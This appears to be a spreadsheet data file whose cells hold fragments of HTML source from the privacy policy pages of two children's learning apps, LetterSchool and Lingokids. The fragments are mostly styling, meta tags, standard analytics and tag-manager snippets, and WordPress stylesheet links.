0.24s ease-in-out;}.wf-loading .font-preschool-3{opacity: 0;}.ie.wf-loading .font-preschool-3{visibility: hidden;}.font-preschool-4{font-family:Nunito;font-weight:700;opacity: 1;visibility: visible;-webkit-transition: opacity 0.24s ease-in-out;-moz-transition: opacity 0.24s ease-in-out;transition: opacity 0.24s ease-in-out;}.wf-loading .font-preschool-4{opacity: 0;}.ie.wf-loading .font-preschool-4{visibility: hidden;}.title-bar .page-title{font-family:Montserrat;text-align:center;line-height:31px;font-weight:700;font-style:normal;color:#fff;font-size:31px;opacity: 1;visibility: visible;-webkit-transition: opacity 0.24s ease-in-out;-moz-transition: opacity 0.24s ease-in-out;transition: opacity 0.24s ease-in-out;}.wf-loading .title-bar .page-title{opacity: 0;}.ie.wf-loading .title-bar .page-title{visibility: hidden;}.title-bar, .title-bar-shop{background-color:#000000;background-repeat:no-repeat;background-size:cover;background-position:center top;background-image:url('https://www.letterschool.org/wp-content/uploads/2019/08/kids-ipad-letterschool-2.jpg');}.title-bar, .title-bar-shop{margin-right:0;margin-bottom:20px;margin-left:0;}.title-bar, .title-bar-shop{padding-top:140px;padding-right:0;padding-bottom:140px;padding-left:0;}&lt;/style&gt;&lt;noscript&gt;&lt;style type="text/css"&gt; .wpb_animate_when_almost_visible { opacity: 1; }&lt;/style&gt;&lt;/noscript&gt;
&lt;!-- START - Open Graph for Facebook, Google+ and Twitter Card Tags 2.2.7 --&gt;
 &lt;!--</t>
  </si>
  <si>
    <t>Facebook Open Graph --&gt;
  &lt;meta property="og:locale" content="en_US"/&gt;
  &lt;meta property="og:site_name" content="LetterSchool"/&gt;
  &lt;meta property="og:title" content="Privacy Policy"/&gt;
  &lt;meta property="og:url" content="https://www.letterschool.org/privacy-policy/"/&gt;
  &lt;meta property="og:type" content="article"/&gt;
  &lt;meta property="og:description" content="Privacy Policy"/&gt;
  &lt;meta property="og:image" content="http://www.letterschool.org/wp-content/uploads/2018/04/Screenshot-1-iPad.png"/&gt;
  &lt;meta property="og:image:url" content="http://www.letterschool.org/wp-content/uploads/2018/04/Screenshot-1-iPad.png"/&gt;
 &lt;!-- Google+ / Schema.org --&gt;
  &lt;meta itemprop="name" content="Privacy Policy"/&gt;
  &lt;meta itemprop="headline" content="Privacy Policy"/&gt;
  &lt;meta itemprop="description" content="Privacy Policy"/&gt;
  &lt;meta itemprop="image" content="http://www.letterschool.org/wp-content/uploads/2018/04/Screenshot-1-iPad.png"/&gt;
  &lt;meta itemprop="author" content="sjoerdhuitema"/&gt;
  &lt;!</t>
  </si>
  <si>
    <t>--&lt;meta itemprop="publisher" content="LetterSchool"/&gt;--&gt; &lt;!-- To solve: The attribute publisher.itemtype has an invalid value --&gt;
 &lt;!-- Twitter Cards --&gt;
  &lt;meta name="twitter:title" content="Privacy Policy"/&gt;
  &lt;meta name="twitter:url" content="https://www.letterschool.org/privacy-policy/"/&gt;
  &lt;meta name="twitter:description" content="Privacy Policy"/&gt;
  &lt;meta name="twitter:image" content="http://www.letterschool.org/wp-content/uploads/2018/04/Screenshot-1-iPad.png"/&gt;
  &lt;meta name="twitter:card" content="summary_large_image"/&gt;
 &lt;!-- SEO --&gt;
 &lt;!--</t>
  </si>
  <si>
    <t xml:space="preserve">Misc. tags --&gt;
 &lt;!-- is_singular --&gt;
&lt;!-- END - Open Graph for Facebook, Google+ and Twitter Card Tags 2.2.7 --&gt;
	&lt;!-- Facebook Pixel Code --&gt;
&lt;script&gt;
! function(f,b,e,v,n,t,s)
{if(f.fbq)return;n=f.fbq=function(){n.callMethod?
</t>
  </si>
  <si>
    <t>n.callMethod.apply(n,arguments):n.queue.push(arguments)};
if(!f._fbq)f._fbq=n;n.push=n;n.loaded=!0;n.version='2.0';
n.queue=[];t=b.createElement(e);t.async=!0;
t.src=v;s=b.getElementsByTagName(e)[0];
s.parentNode.insertBefore(t,s)}(window,document,'script',
'https://connect.facebook.net/en_US/fbevents.js');
 fbq('init', '388978058478050'); 
fbq('track', 'PageView');
&lt;/script&gt;
&lt;noscript&gt;
 &lt;img height="1" width="1" 
src="https://www.facebook.com/tr?id=388978058478050&amp;ev=PageView
&amp;noscript=1"/&gt;
&lt;/noscript&gt;
&lt;!-- End Facebook Pixel Code --&gt;
	&lt;/head&gt;
	&lt;body class="privacy-policy page-template-default page page-id-4520 wide wpb-js-composer js-comp-ver-5.3 vc_responsive"&gt;	
&lt;!-- Google Tag Manager (noscript)&lt;noscript&gt;&lt;iframe src="https://www.googletagmanager.com/ns.html?id=GTM-ML2PBMD"
height="0" width="0" style="display:none;visibility:hidden"&gt;&lt;/iframe&gt;&lt;/noscript&gt;
&lt;!--</t>
  </si>
  <si>
    <t>End Google Tag Manager (noscript) --&gt;
		&lt;div id="jws_theme_wrapper"&gt;
						&lt;div class="tb-header-wrap tb-header-v1 tb-header-stick"&gt;
	&lt;!-- End Header Sidebar --&gt;
	&lt;div class="tb-logo logo-hidden-mobi hidden-lg text-center"&gt;
		&lt;a href="https://www.letterschool.org"&gt;
			&lt;img src="https://www.letterschool.org/wp-content/uploads/2019/09/logo-new-1.png" class="main-logo" alt="Main Logo"/&gt;		&lt;/a&gt;
	&lt;/div&gt;
	&lt;!-- Start Header Menu --&gt;
			&lt;div class="tb-header-menu tb-header-menu-md"&gt;
			&lt;div class="container"&gt;
				&lt;div class="tb-header-menu-inner"&gt;
					&lt;div class="row"&gt;
						&lt;div class=" col-xs-5 col-sm-4 col-md-2 col-lg-2"&gt;
							&lt;div class="tb-menu-control-mobi"&gt;
								&lt;a href="javascript:void(0)"&gt;&lt;i class="fa fa-bars"&gt;&lt;/i&gt;Menu&lt;/a&gt;
							&lt;/div&gt;
							&lt;div class="tb-logo hidden-sm"&gt;
								&lt;a href="https://www.letterschool.org"&gt;
									&lt;img src="https://www.letterschool.org/wp-content/uploads/2019/09/logo-new-1.png" class="main-logo" alt="Main Logo"/&gt;								&lt;/a&gt;
							&lt;/div&gt;
						&lt;/div&gt;
						&lt;div class="col-xs-7 col-sm-8 col-md-10 col-lg-10 mre-sty-header"&gt;
							&lt;div class="widget_searchform_content hidden-lg"&gt;
								&lt;a href="javascript:void(0)"</t>
  </si>
  <si>
    <t>class="icon icon_search_wrap"&gt;&lt;i class="fa fa-search search-icon"&gt;&lt;/i&gt;&lt;/a&gt;
								&lt;form method="get" action="https://www.letterschool.org/"&gt;
									&lt;input type="text" value="" name="s" placeholder="Enter your search..." /&gt;
									&lt;button type="submit" class="btn btn-default"&gt;&lt;i class="fa fa-search"&gt;&lt;/i&gt;&lt;/button&gt;
								&lt;/form&gt;
							&lt;/div&gt;
							&lt;div class="tb-menu"&gt;
								&lt;div class="tb-menu-list"&gt;&lt;ul id="nav" class="tb-menu-list-inner"&gt;&lt;li id="menu-item-4420" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-4420" data-depth="0"&gt;&lt;a href="https://www.letterschool.org/how-why/"&gt;&lt;span class="menu-title"&gt;How &amp;#038; Why&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li id="menu-item-5763" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-5763" data-depth="0"&gt;&lt;a href="https://www.letterschool.org/wip-new-letterschool-for-schools/"&gt;&lt;span class="menu-title"&gt;For Schools&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li id="menu-item-5996" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-5996" data-depth="0"&gt;&lt;a href="https://www.letterschool.org/letterschool-for-parents/"&gt;&lt;span class="menu-title"&gt;For Parents&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li id="menu-item-4305" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-4305" data-depth="0"&gt;&lt;a href="https://www.letterschool.org/faqs/"&gt;&lt;span class="menu-title"&gt;Support&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li id="menu-item-6250" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-6250" data-depth="0"&gt;&lt;a href="https://www.letterschool.org/account/"&gt;&lt;span class="menu-title"&gt;My Account&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;								
							&lt;/div&gt;
						&lt;/div&gt;
					&lt;/div&gt;
				&lt;/div&gt;
			&lt;/div&gt;
		&lt;/div&gt;
&lt;/div&gt;
&lt;div class="jws_theme_menu_mobi"&gt;
	&lt;div class="tb-menu"&gt;
		&lt;div class="tb-menu-list tb-menu-mobi-list"&gt;&lt;ul id="nav" class="tb-menu-list-inner"&gt;&lt;li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-4420" data-depth="0"&gt;&lt;a href="https://www.letterschool.org/how-why/"&gt;&lt;span class="menu-title"&gt;How &amp;#038; Why&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-5763" data-depth="0"&gt;&lt;a href="https://www.letterschool.org/wip-new-letterschool-for-schools/"&gt;&lt;span class="menu-title"&gt;For Schools&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-5996" data-depth="0"&gt;&lt;a href="https://www.letterschool.org/letterschool-for-parents/"&gt;&lt;span class="menu-title"&gt;For Parents&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-4305" data-depth="0"&gt;&lt;a href="https://www.letterschool.org/faqs/"&gt;&lt;span class="menu-title"&gt;Support&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-6250" data-depth="0"&gt;&lt;a href="https://www.letterschool.org/account/"&gt;&lt;span class="menu-title"&gt;My Account&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;	&lt;/div&gt;
&lt;/div&gt;
&lt;!-- End Header Menu --&gt;					&lt;div class="title-bar"&gt;
			&lt;div class="container"&gt;
				&lt;div class="text-center"&gt;
					&lt;h1 class="page-title"&gt;Privacy Policy&lt;/h1&gt;
									&lt;/div&gt;
			&lt;/div&gt;
		&lt;/div&gt;
				&lt;div class="main-content"&gt;_x005F_x000D_
		_x005F_x000D_
		_x005F_x000D_
			&lt;div  class=" vc_row6437375bcfdd7 vc_row wpb_row  "&gt;&lt;div class="container"&gt;&lt;div class="row"&gt;
	&lt;div class="vc_col-sm-12 wpb_column vc_column_container "&gt;
		&lt;div class="wpb_wrapper"&gt;
	&lt;div class="wpb_text_column wpb_content_element " &gt;
		&lt;div class="wpb_wrapper"&gt;
			&lt;h2 style="text-align: center;"&gt;&lt;strong&gt;</t>
  </si>
  <si>
    <t>Privacy Policy for LetterSchool&lt;/strong&gt;&lt;/h2&gt;
&lt;p style="text-al</t>
  </si>
  <si>
    <t>&lt;!doctype html&gt;
&lt;html lang="en-US"&gt;
&lt;head&gt;
	&lt;meta charset="UTF-8"&gt;
		&lt;meta name="viewport" content="width=device-width, initial-scale=1"&gt;
	&lt;link rel="profile" href="https://gmpg.org/xfn/11"&gt;
	&lt;meta name='robots' content='index, follow, max-image-preview:large, max-snippet:-1, max-video-preview:-1' /&gt;
&lt;!-- OneTrust Cookies Consent Notice start for lingokids.com --&gt;_x005F_x000D_
&lt;script src="https://cdn.cookielaw.org/scripttemplates/otSDKStub.js"  type="text/javascript" charset="UTF-8" data-domain-script="12d6576f-8d15-4a63-bcbe-5eeed2784453"  defer&gt;&lt;/script&gt;_x005F_x000D_
&lt;script type="text/javascript" src="data:text/javascript,function%20OptanonWrapper%28%29%20%7B%20%7D" defer&gt;&lt;/script&gt;_x005F_x000D_
&lt;!-- OneTrust Cookies Consent Notice end for lingokids.com --&gt;&lt;link rel="alternate" href="https://lingokids.com/privacy-policy" hreflang="en" /&gt;
&lt;link rel="alternate" href="https://lingokids.com/es/politica-de-privacidad" hreflang="es" /&gt;
&lt;!--</t>
  </si>
  <si>
    <t>Google Tag Manager for WordPress by gtm4wp.com --&gt;
&lt;script data-cfasync="false" data-pagespeed-no-defer src="data:text/javascript,var%20gtm4wp_datalayer_name%20%3D%20%22dataLayer%22%3B%0A%09var%20dataLayer%20%3D%20dataLayer%20%7C%7C%20%5B%5D%3B%0A%09const%20gtm4wp_use_sku_instead%20%3D%20false%3B%0A%09const%20gtm4wp_id_prefix%20%3D%20%27%27%3B%0A%09const%20gtm4wp_remarketing%20%3D%20false%3B%0A%09const%20gtm4wp_eec%20%3D%20true%3B%0A%09const%20gtm4wp_classicec%20%3D%20false%3B%0A%09const%20gtm4wp_currency%20%3D%20%27USD%27%3B%0A%09const%20gtm4wp_product_per_impression%20%3D%20false%3B%0A%09const%20gtm4wp_needs_shipping_address%20%3D%20false%3B%0A%09const%20gtm4wp_business_vertical%20%3D%20%27education%27%3B%0A%09const%20gtm4wp_business_vertical_id%20%3D%20%27id%27%3B" defer&gt;&lt;/script&gt;
&lt;!-- End Google Tag Manager for WordPress by gtm4wp.com --&gt;
	&lt;!-- This site is optimized with the Yoast SEO Premium plugin v20.4 (Yoast SEO v20.5) - https://yoast.com/wordpress/plugins/seo/ --&gt;
	&lt;title&gt;Privacy Policy - Lingokids - The Playlearning™ App in English&lt;/title&gt;
	&lt;link rel="canonical" href="https://lingokids.com/privacy-policy" /&gt;
	&lt;meta property="og:locale" content="en_US" /&gt;
	&lt;meta property="og:locale:alternate" content="es_ES" /&gt;
	&lt;meta property="og:type" content="article" /&gt;
	&lt;meta property="og:title" content="Privacy Policy" /&gt;
	&lt;meta property="og:description" content="Effective Date: June 10th, 2020 Click here for Specific Terms for EU users &amp;nbsp; Lingokids is founded on the principle of improving the world’s access to quality education and we are committed to providing an educational, entertaining, and safe service for kids and parents.</t>
  </si>
  <si>
    <t>We know that you care about how your family’s personal information [&amp;hellip;]" /&gt;
	&lt;meta property="og:url" content="https://lingokids.com/privacy-policy" /&gt;
	&lt;meta property="og:site_name" content="Lingokids - The Playlearning™ App in English" /&gt;
	&lt;meta property="article:modified_time" content="2022-02-17T16:13:16+00:00" /&gt;
	&lt;meta property="og:image" content="https://lingokids.com/wp-content/uploads/2020/07/footer-lingokids-1-1.png" /&gt;
	&lt;meta property="og:image:width" content="2454" /&gt;
	&lt;meta property="og:image:height" content="828" /&gt;
	&lt;meta property="og:image:type" content="image/png" /&gt;
	&lt;meta name="twitter:card" content="summary_large_image" /&gt;
	&lt;meta name="twitter:label1" content="Est. reading time" /&gt;
	&lt;meta name="twitter:data1" content="25 minutes" /&gt;
	&lt;script type="application/ld+json" class="yoast-schema-graph"&gt;{"@context":"https://schema.org","@graph":[{"@type":"WebPage","@id":"https://lingokids.com/privacy-policy","url":"https://lingokids.com/privacy-policy","name":"Privacy Policy - Lingokids - The Playlearning™ App in English","isPartOf":{"@id":"https://lingokids.com/#website"},"datePublished":"2021-08-30T13:04:43+00:00","dateModified":"2022-02-17T16:13:16+00:00","breadcrumb":{"@id":"https://lingokids.com/privacy-policy#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https://lingokids.com/privacy-policy"]}]},{"@type":"BreadcrumbList","@id":"https://lingokids.com/privacy-policy#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https://lingokids.com/"},{"@type":"ListItem","position":2,"name":"Privacy Policy"}]},{"@type":"WebSite","@id":"https://lingokids.com/#website","url":"https://lingokids.com/","name":"Lingokids -</t>
  </si>
  <si>
    <t>The Playlearning™ App in English","description":"","publisher":{"@id":"https://lingokids.com/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https://lingokids.com/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https://lingokids.com/#organization","name":"Lingokids - The Playlearning™ App in English","url":"https://lingokids.com/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https://lingokids.com/#/schema/logo/image/","url":"https://lingokids.com/wp-content/uploads/2023/02/logo-lingo_eng.svg","contentUrl":"https://lingokids.com/wp-content/uploads/2023/02/logo-lingo_eng.svg","width":261,"height":49,"caption":"Lingokids - The Playlearning™ App in English"},"image":{"@id":"https://lingokids.com/#/schema/logo/image/"}}]}&lt;/script&gt;
	&lt;! -- / Yoast SEO Premium plugin. --&gt;
&lt;link rel='dns-prefetch' href='//s0.wp.com' /&gt;
&lt;link rel='dns-prefetch' href='//stats.wp.com' /&gt;
&lt;link rel='dns-prefetch' href='//jetpack.wordpress.com' /&gt;
&lt;link rel='dns-prefetch' href='//public-api.wordpress.com' /&gt;
&lt;link rel='dns-prefetch' href='//0.gravatar.com' /&gt;
&lt;link rel='dns-prefetch' href='//1.gravatar.com' /&gt;
&lt;link rel='dns-prefetch' href='//2.gravatar.com' /&gt;
&lt;link rel='dns-prefetch' href='//widgets.wp.com' /&gt;
&lt;link rel="alternate" type="application/rss+xml" title="Lingokids - The Playlearning™ App in English &amp;raquo; Feed" href="https://lingokids.com/feed" /&gt;
&lt;link rel="alternate" type="application/rss+xml" title="Lingokids - The Playlearning™ App in English &amp;raquo; Comments Feed" href="https://lingokids.com/comments/feed" /&gt;
&lt;script src="data:text/javascript,window._wpemojiSettings%20%3D%20%7B%22baseUrl%22%3A%22https%3A%5C%2F%5C%2Fs.w.org%5C%2Fimages%5C%2Fcore%5C%2Femoji%5C%2F14.0.0%5C%2F72x72%5C%2F%22%2C%22ext%22%3A%22.png%22%2C%22svgUrl%22%3A%22https%3A%5C%2F%5C%2Fs.w.org%5C%2Fimages%5C%2Fcore%5C%2Femoji%5C%2F14.0.0%5C%2Fsvg%5C%2F%22%2C%22svgExt%22%3A%22.svg%22%2C%22source%22%3A%7B%22concatemoji%22%3A%22https%3A%5C%2F%5C%2Flingokids.com%5C%2Fwp-includes%5C%2Fjs%5C%2Fwp-emoji-release.min.js%3Fver%3D6.2%22%7D%7D%3B%0A%2F%2A%21%20This%20file%20is%20auto-generated%20%2A%2F%0A%21function%28e%2Ca%2Ct%29%7Bvar%20n%2Cr%2Co%2Ci%3Da.createElement%28%22canvas%22%29%2Cp%3Di.getContext%26%26i.getContext%28%222d%22%29%3Bfunction%20s%28e%2Ct%29%7Bp.clearRect%280%2C0%2Ci.width%2Ci.height%29%2Cp.fillText%28e%2C0%2C0%29%3Be%3Di.toDataURL%28%29%3Breturn%20p.clearRect%280%2C0%2Ci.width%2Ci.height%29%2Cp.fillText%28t%2C0%2C0%29%2Ce%3D%3D%3Di.toDataURL%28%29%7Dfunction%20c%28e%29%7Bvar%20t%3Da.createElement%28%22script%22%29%3Bt.src%3De%2Ct.defer%3Dt.type%3D%22text%2Fjavascript%22%2Ca.getElementsByTagName%28%22head%22%29%5B0%5D.appendChild%28t%29%7Dfor%28o%3DArray%28%22flag%22%2C%22emoji%22%29%2Ct.supports%3D%7Beverything%3A%210%2CeverythingExceptFlag%3A%210%7D%2Cr%3D0%3Br%3Co.length%3Br%2B%2B%29t.supports%5Bo%5Br%5D%5D%3Dfunction%28e%29%7Bif%28p%26%26p.fillText%29switch%28p.textBaseline%3D%22top%22%2Cp.font%3D%22600%2032px%20Arial%22%2Ce%29%7Bcase%22flag%22%3Areturn%20s%28%22%5Cud83c%5Cudff3%5Cufe0f%5Cu200d%5Cu26a7%5Cufe0f%22%2C%22%5Cud83c%5Cudff3%5Cufe0f%5Cu200b%5Cu26a7%5Cufe0f%22%29%3F%211%3A%21s%28%22%5Cud83c%5Cuddfa%5Cud83c%5Cuddf3%22%2C%22%5Cud83c%5Cuddfa%5Cu200b%5Cud83c%5Cuddf3%22%29%26%26%21s%28%22%5Cud83c%5Cudff4%5Cudb40%5Cudc67%5Cudb40%5Cudc62%5Cudb40%5Cudc65%5Cudb40%5Cudc6e%5Cudb40%5Cudc67%5Cudb40%5Cudc7f%22%2C%22%5Cud83c%5Cudff4%5Cu200b%5Cudb40%5Cudc67%5Cu200b%5Cudb40%5Cudc62%5Cu200b%5Cudb40%5Cudc65%5Cu200b%5Cudb40%5Cudc6e%5Cu200b%5Cudb40%5Cudc67%5Cu200b%5Cudb40%5Cudc7f%22%29%3Bcase%22emoji%22%3Areturn%21s%28%22%5Cud83e%5Cudef1%5Cud83c%5Cudffb%5Cu200d%5Cud83e%5Cudef2%5Cud83c%5Cudfff%22%2C%22%5Cud83e%5Cudef1%5Cud83c%5Cudffb%5Cu200b%5Cud83e%5Cudef2%5Cud83c%5Cudfff%22%29%7Dreturn%211%7D%28o%5Br%5D%29%2Ct.supports.everything%3Dt.supports.everything%26%26t.supports%5Bo%5Br%5D%5D%2C%22flag%22%21%3D%3Do%5Br%5D%26%26%28t.supports.everythingExceptFlag%3Dt.supports.everythingExceptFlag%26%26t.supports%5Bo%5Br%5D%5D%29%3Bt.supports.everythingExceptFlag%3Dt.supports.everythingExceptFlag%26%26%21t.supports.flag%2Ct.</t>
  </si>
  <si>
    <t>DOMReady%3D%211%2Ct.readyCallback%3Dfunction%28%29%7Bt.DOMReady%3D%210%7D%2Ct.supports.everything%7C%7C%28n%3Dfunction%28%29%7Bt.readyCallback%28%29%7D%2Ca.addEventListener%3F%28a.addEventListener%28%22DOMContentLoaded%22%2Cn%2C%211%29%2Ce.addEventListener%28%22load%22%2Cn%2C%211%29%29%3A%28e.attachEvent%28%22onload%22%2Cn%29%2Ca.attachEvent%28%22onreadystatechange%22%2Cfunction%28%29%7B%22complete%22%3D%3D%3Da.readyState%26%26t.readyCallback%28%29%7D%29%29%2C%28e%3Dt.source%7C%7C%7B%7D%29.concatemoji%3Fc%28e.concatemoji%29%3Ae.wpemoji%26%26e.twemoji%26%26%28c%28e.twemoji%29%2Cc%28e.wpemoji%29%29%29%7D%28window%2Cdocument%2Cwindow._wpemojiSettings%29%3B" defer&gt;&lt;/script&gt;
&lt;style&gt;img.wp-smiley,
img.emoji {
	display: inline !important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 0.07em ! important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}&lt;/style&gt;
	&lt;link rel='stylesheet' id='dce-animations-css' href='https://lingokids.com/wp-content/plugins/dynamic-content-for-elementor/assets/css/animations.css?ver=2.9.2' media='all' /&gt;
&lt;link rel='stylesheet' id='wp-block-library-css' href='https://lingokids.com/wp-content/cache/flying-press/lingokids.com/6dfc25938ba5.style.min.css' media='all' /&gt;
&lt;style id='wp-block-library-inline-css'&gt;.has-text-align-justify{text-align:justify;}&lt;/style&gt;
&lt;link rel='stylesheet' id='mediaelement-css' href='https://lingokids.com/wp-content/cache/flying-press/lingokids.com/1a57d30fccd2.mediaelementplayer-legacy.min.css' media='all' /&gt;
&lt;link rel='stylesheet' id='wp-mediaelement-css' href='https://lingokids.com/wp-content/cache/flying-press/lingokids.com/d0a6ec3407c8.wp-mediaelement.min.css' media='all' /&gt;
&lt;link rel='stylesheet' id='wc-blocks-vendors-style-css' href='https://lingokids.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-blocks-vendors-style.css?ver=9.6.6' media='all' /&gt;
&lt;link rel='stylesheet' id='wc-blocks-style-css' href='https://lingokids.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-blocks-style.css?ver=9.6.6' media='all' /&gt;
&lt;link rel='stylesheet' id='classic-theme-styles-css' href='https://lingokids.com/wp-content/cache/flying-press/lingokids.com/829429a2d4c9.classic-themes.min.css' media='all' /&gt;
&lt;style id='global-styles-inline-css'&gt;body{--wp--preset--color--black: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t>
  </si>
  <si>
    <t>important;}
.wp-block-navigation a:where(:not(.wp-element-button)){color: inherit;}
:where(.wp-block-columns.is-layout-flex){gap: 2em;}
.wp-block-pullquote{font-size: 1.5em;line-height: 1.6;}&lt;/style&gt;
&lt;link rel='stylesheet' id='lead-css-css' href='https://lingokids.com/wp-content/plugins/lingo-leads/assets/css/modules.css?ver=6.2' media='all' /&gt;
&lt;link rel='stylesheet' id='menu-image-css' href='https://lingokids.com/wp-content/plugins/menu-image/includes/css/menu-image.css?ver=3.0.8' media='all' /&gt;
&lt;link rel='stylesheet' id='dashicons-css' href='https://lingokids.com/wp-content/cache/flying-press/lingokids.com/205b00978bb5.dashicons.min.css' media='all' /&gt;
&lt;link rel='stylesheet' id='woocommerce-layout-css' href='https://lingokids.com/wp-content/plugins/woocommerce/assets/css/woocommerce-layout.css?ver=7.5.1' media='all' /&gt;
&lt;style id='woocommerce-layout-inline-css'&gt;.infinite-scroll .woocommerce-pagination {
		display: none;
	}&lt;/style&gt;
&lt;link rel='stylesheet' id='woocommerce-smallscreen-css' href='https://lingokids.com/wp-content/plugins/woocommerce/assets/css/woocommerce-smallscreen.css?ver=7.5.1' media='only screen and (max-width: 768px)' /&gt;
&lt;link rel='stylesheet' id='woocommerce-general-css' href='https://lingokids.com/wp-content/plugins/woocommerce/assets/css/woocommerce.css?ver=7.5.1' media='all' /&gt;
&lt;style id='woocommerce-inline-inline-css'&gt;.woocommerce form .form-row .required { visibility: visible; }&lt;/style&gt;
&lt;link rel='stylesheet' id='hfe-style-css' href='https://lingokids.com/wp-content/plugins/header-footer-elementor/assets/css/header-footer-elementor.css?ver=1.6.13' media='all' /&gt;
&lt;link rel='stylesheet' id='elementor-icons-css' href='https://lingokids.com/wp-content/plugins/elementor/assets/lib/eicons/css/elementor-icons.min.css?ver=5.18.0' media='all' /&gt;
&lt;link rel='stylesheet' id='elementor-frontend-legacy-css' href='https://lingokids.com/wp-content/uploads/elementor/css/custom-frontend-legacy.min.css?ver=3.12.1' media='all' /&gt;
&lt;link rel='stylesheet' id='elementor-frontend-css' href='https://lingokids.com/wp-content/uploads/elementor/css/custom-frontend.min.css?ver=1681305261' media='all' /&gt;
&lt;link rel='stylesheet' id='swiper-css' href='https://lingokids.com/wp-content/plugins/elementor/assets/lib/swiper/css/swiper.min.css?ver=5.3.6' media='all' /&gt;
&lt;link rel='stylesheet' id='elementor-post-11309-css' href='https://lingokids.com/wp-content/uploads/elementor/css/post-11309.css?ver=1681305262' media='all' /&gt;
&lt;link rel='stylesheet' id='elementor-pro-css' href='https://lingokids.com/wp-content/uploads/elementor/css/custom-pro-frontend.min.css?ver=1681305262' media='all' /&gt;
&lt;link rel='stylesheet' id='uael-frontend-css' href='https://lingokids.com/wp-content/plugins/ultimate-elementor/assets/min-css/uael-frontend.min.css?ver=1.36.15' media='all' /&gt;
&lt;link rel='stylesheet' id='elementor-global-css' href='https://lingokids.com/wp-content/uploads/elementor/css/global.css?ver=1681305264' media='all' /&gt;
&lt;!-- `jetpack_likes` is included in the concatenated jetpack.css --&gt;_x005F_x000D_
&lt;link rel='stylesheet' id='hello-elementor-theme-style-css' href='https://lingokids.com/wp-content/themes/hello-elementor/theme.min.css?ver=2.6.1' media='all' /&gt;
&lt;link rel='stylesheet' id='hello-elementor-child-style-css' href='https://lingokids.com/wp-content/themes/hello-theme-child-master/style.css?ver=1.0.0' media='all' /&gt;
&lt;link rel='stylesheet' id='hello-elementor-css' href='https://lingokids.com/wp-content/themes/hello-elementor/style.min.css?ver=2.6.1' media='all' /&gt;
&lt;link rel='stylesheet' id='elementor-post-11320-css' href='https://lingokids.com/wp-content/uploads/elementor/css/post-11320.css?ver=1681305262' media='all' /&gt;
&lt;link rel='stylesheet' id='hfe-widgets-style-css' href='https://lingokids.com/wp-content/plugins/header-footer-elementor/inc/widgets-css/frontend.css?ver=1.6.13' media='all' /&gt;
&lt;link rel='stylesheet' id='elementor-post-11573-css' href='https://lingokids.com/wp-content/uploads/elementor/css/post-11573.css?ver=1681305263' media='all' /&gt;
&lt;link rel='stylesheet' id='elementor-post-11709-css' href='https://lingokids.com/wp-content/uploads/elementor/css/post-11709.css?ver=1681305263' media='all' /&gt;
&lt;link rel='stylesheet' id='wp-calypso-bridge-masterbar-css' href='https://lingokids.com/wp-content/mu-plugins/wpcomsh/vendor/automattic/wc-calypso-bridge/store-on-wpcom/assets/css/masterbar.css?ver=2.0.14' media='all' /&gt;
&lt;link rel='stylesheet' id='wapf-frontend-css' href='https://lingokids.com/wp-content/plugins/advanced-product-fields-for-woocommerce-pro/assets/css/frontend.min.css?ver=2.5' media='all' /&gt;
&lt;link rel='stylesheet' id='google-fonts-1-css' href='https://fonts-api.wp.com/css?family=Roboto%3A100%2C100italic%2C200%2C200italic%2C300%2C300italic%2C400%2C400italic%2C500%2C500italic%2C600%2C600italic%2C700%2C700italic%2C800%2C800italic%2C900%2C900italic&amp;#038;display=auto&amp;#038;ver=6.2' media='all' /&gt;
&lt;link rel='stylesheet' id='elementor-icons-shared-0-css' href='https://lingokids.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/fontawesome.min.css?ver=5.15.3' media='all' /&gt;
&lt;link rel='stylesheet' id='elementor-icons-fa-solid-css' href='https://lingokids.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/solid.min.css?ver=5.15.3' media='all' /&gt;
&lt;link rel='stylesheet' id='elementor-icons-fa-brands-css' href='https://lingokids.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/brands.min.css?ver=5.15.3' media='all' /&gt;
&lt;link rel='stylesheet' id='elementor-icons-fa-regular-css' href='https://lingokids.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/regular.min.css?ver=5.15.3' media='all' /&gt;
&lt;link rel='stylesheet' id='jetpack_css-css' href='https://lingokids.com/wp-content/plugins/jetpack/css/jetpack.css?ver=12.1-a.5' media='all' /&gt;
&lt;script src='https://s0.wp.com/wp-content/plugins/video/assets/js/videojs/videopress-iframe-api.js?ver=202315' id='jetpack-videopress-video-block-view-iframe-api-js' defer&gt;&lt;/script&gt;
